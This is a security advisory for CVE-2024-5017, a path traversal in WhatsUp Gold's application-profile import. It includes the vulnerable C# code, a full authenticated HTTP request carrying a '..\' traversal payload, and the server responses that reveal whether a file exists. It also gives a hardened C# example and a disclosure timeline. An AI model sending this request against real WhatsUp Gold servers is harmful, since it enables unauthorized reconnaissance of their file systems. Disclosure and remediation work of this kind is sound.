CVE-2024-5017
A path traversal vulnerability exists in the AppProfileImport functionality of Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697. A specially crafted HTTP request can lead to information disclosure. An attacker can make an authenticated HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697
WhatsUp Gold - https://www.whatsupgold.com/
6.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
WhatsUp Gold is a network monitoring and management software developed by Progress. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.
An authenticated user can upload a new Application profile definition file (XML) for monitoring by navigating to:
Settings -> Application monitoring -> Application and profile setup -> Application Profiles -> Import
Let us take a look at the controller implementation responsible for handling this action:
Apm.UI\Apm\UI\Areas\APM\Controllers\Api\Applications\AppProfileImportController.cs
Line 1 namespace Apm.UI.Areas.APM.Controllers.Api.Applications
Line 2 {
Line 3 public class AppProfileImportController : ApplicationControllerBase
Line 4 {
Line 5
Line 6 (...)
Line 7
Line 8 public async Task<HttpResponseMessage> Post(string fileName, int uploadOption)
Line 9 {
Line 10
Line 11 (...)
Line 12
Line 13 if (uploadOption == 0 && File.Exists(getPath(fileName)))
Line 14 {
Line 15 return getResponse(new ResultModel
Line 16 {
Line 17 message = "FILE_EXISTS",
Line 18 success = false
Line 19 });
Line 20 }
Line 21 }
Line 22
Line 23 private string getPath(string fileName = null)
Line 24 {
Line 25 string text = HostingEnvironment.MapPath("~/Content/Apm/Import");
Line 26 if (!string.IsNullOrWhiteSpace(fileName))
Line 27 {
Line 28 return Path.Combine(text, fileName);
Line 29 }
Line 30 return text;
Line 31 }
Apparent from the above is that the fileName argument is fully controlled by an attacker and is used as the File.Exists argument at line 13.
We can also observe that there is no path traversal protection implemented inside the getPath function (line 23): the attacker-controlled fileName value is simply combined with the import directory using Path.Combine (line 28), which neither strips ".." segments nor checks that the resulting path stays under that directory.
Such conditions allow the attacker to conduct a path traversal attack and check the existence of any file within the file system that the application's IIS process identity is permitted to read (File.Exists returns false rather than raising an error when the caller lacks permission), using the difference between the FILE_EXISTS response and the error response shown below as an oracle.
An attacker needs to be authenticated and send the following request:
REQ
POST /NmConsole/api/core/AppProfileImport?fileName=..\..\..\..\..\..\..\..\swapfile.sys&uploadOption=0 HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------25967750313659734821777115140
Content-Length: 37688
Origin: http://192.168.0.252
Connection: close
Referer: http://192.168.0.252/NmConsole/
Cookie: ASP.NET_SessionId=p5pzkxhx4kilqqvufzxf05se; langid=1033; .ASPXAUTH=A488824F3A736795051CAAE0DDDEE70583758077C846B3D8F8F706975CAC36BC398E5E9D4C0271BC05C2D70FD62F7CC774F6FE917C7F9862B7CEEE71B8557B3C125F06FD92F5C9FB8768C6DD2DD252A3072C5E021874340B90835928157EC9FE
Upgrade-Insecure-Requests: 1
-----------------------------25967750313659734821777115140
Content-Disposition: form-data; name="filefield-2438-button"; filename="Apache Web Server-Linux.xml"
Content-Type: text/xml
<?xml version="1.0"?>
<EntityAPMApplication xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Name>Apache Server</Name>
<Description>Monitors the health and performance of Apache Web Server on Linux. Specify non-standard port in the Attributes section below. Requires SNMP enabled on the Linux system hosting Apache Web Server and access to the Apache server-status web page.</Description>
<ApplicationID>102</ApplicationID>
<ApplicationType>
<Name>Apache HTTP Server</Name>
<Description>Apache</Description>
<ApplicationTypeID>1009</ApplicationTypeID>
<IconPath>apache.png</IconPath>
</ApplicationType>
(...)
-----------------------------25967750313659734821777115140--
RESP
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 26 Jan 2024 12:09:28 GMT
Connection: close
Content-Length: 41
{"success":false,"message":"FILE_EXISTS"}
If the checked file does not exist, the server returns the following response:
RESP
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 26 Jan 2024 11:58:40 GMT
Connection: close
Content-Length: 56
<Error><Message>An error has occurred.</Message></Error>
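The following C# program is an added example written for this page; it is not WhatsUp Gold code and not a vendor patch. It reproduces the vulnerable getPath() pattern beside a hardened version, with a hypothetical literal import directory standing in for HostingEnvironment.MapPath("~/Content/Apm/Import"). Two Path.Combine behaviours matter here: it performs no containment check, so ".." segments survive, and when its second argument is a rooted path (for example C:\Windows\win.ini) it discards the first argument entirely. The hardened version accepts only a bare file name and, as defence in depth, canonicalises the joined path with Path.GetFullPath and verifies it still lies under the import directory before any File.* call is made. Expected output assumes Windows path semantics, as on the IIS host in the advisory.

```csharp
using System;
using System.IO;

// Added example, not WhatsUp Gold code. ImportRoot is a hypothetical stand-in
// for HostingEnvironment.MapPath("~/Content/Apm/Import").
static class ImportPathDemo
{
    static readonly string ImportRoot = @"C:\inetpub\NmConsole\Content\Apm\Import";

    // Vulnerable: mirrors the advisory's getPath(). Path.Combine does no
    // containment check, ".." segments survive, and a rooted fileName makes
    // Path.Combine return the rooted path and drop ImportRoot altogether.
    static string GetPathVulnerable(string fileName)
    {
        if (!string.IsNullOrWhiteSpace(fileName))
            return Path.Combine(ImportRoot, fileName);
        return ImportRoot;
    }

    // Hardened: accept only a bare file name, then canonicalise and verify
    // containment before the caller touches File.Exists / File.WriteAllBytes.
    static string GetPathSafe(string fileName)
    {
        if (string.IsNullOrWhiteSpace(fileName))
            throw new ArgumentException("fileName is required");

        // Path.GetFileName strips any directory part; if that changes the
        // value, a separator or ".." was present. "." and ".." survive
        // GetFileName unchanged, so reject them explicitly.
        if (fileName != Path.GetFileName(fileName)
            || fileName.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0
            || fileName == "." || fileName == "..")
            throw new ArgumentException("invalid fileName");

        // Defence in depth: canonicalise and check the prefix against the
        // canonical import root (with a trailing separator so that a sibling
        // directory such as "ImportEvil" does not pass the StartsWith test).
        string root = Path.GetFullPath(ImportRoot)
                          .TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;
        string full = Path.GetFullPath(Path.Combine(root, fileName));
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            throw new ArgumentException("path escapes import directory");
        return full;
    }

    static void Main()
    {
        string[] inputs =
        {
            "Apache Web Server-Linux.xml",            // legitimate profile upload
            @"..\..\..\..\..\..\..\..\swapfile.sys",   // payload from the advisory
            @"C:\Windows\win.ini",                     // rooted path: Path.Combine drops ImportRoot
        };

        foreach (string name in inputs)
        {
            Console.WriteLine("input:      " + name);
            Console.WriteLine("vulnerable: " + Path.GetFullPath(GetPathVulnerable(name)));
            try
            {
                Console.WriteLine("hardened:   " + GetPathSafe(name));
            }
            catch (ArgumentException e)
            {
                Console.WriteLine("hardened:   rejected (" + e.Message + ")");
            }
            Console.WriteLine();
        }
    }
}
```

On Windows the vulnerable line resolves the advisory's payload to C:\swapfile.sys and the rooted input to C:\Windows\win.ini, while the hardened version rejects both and returns the full path only for the bare XML file name. Note that the hardened getPath still lets an authenticated user learn whether a given file name already exists inside the import directory via the FILE_EXISTS response; that is the intended behaviour of uploadOption == 0, and it is confined to that directory.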
2024-02-07 - Initial Vendor Contact
2024-02-12 - Vendor Disclosure
2024-06-25 - Vendor Patch Release
2024-06-26 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.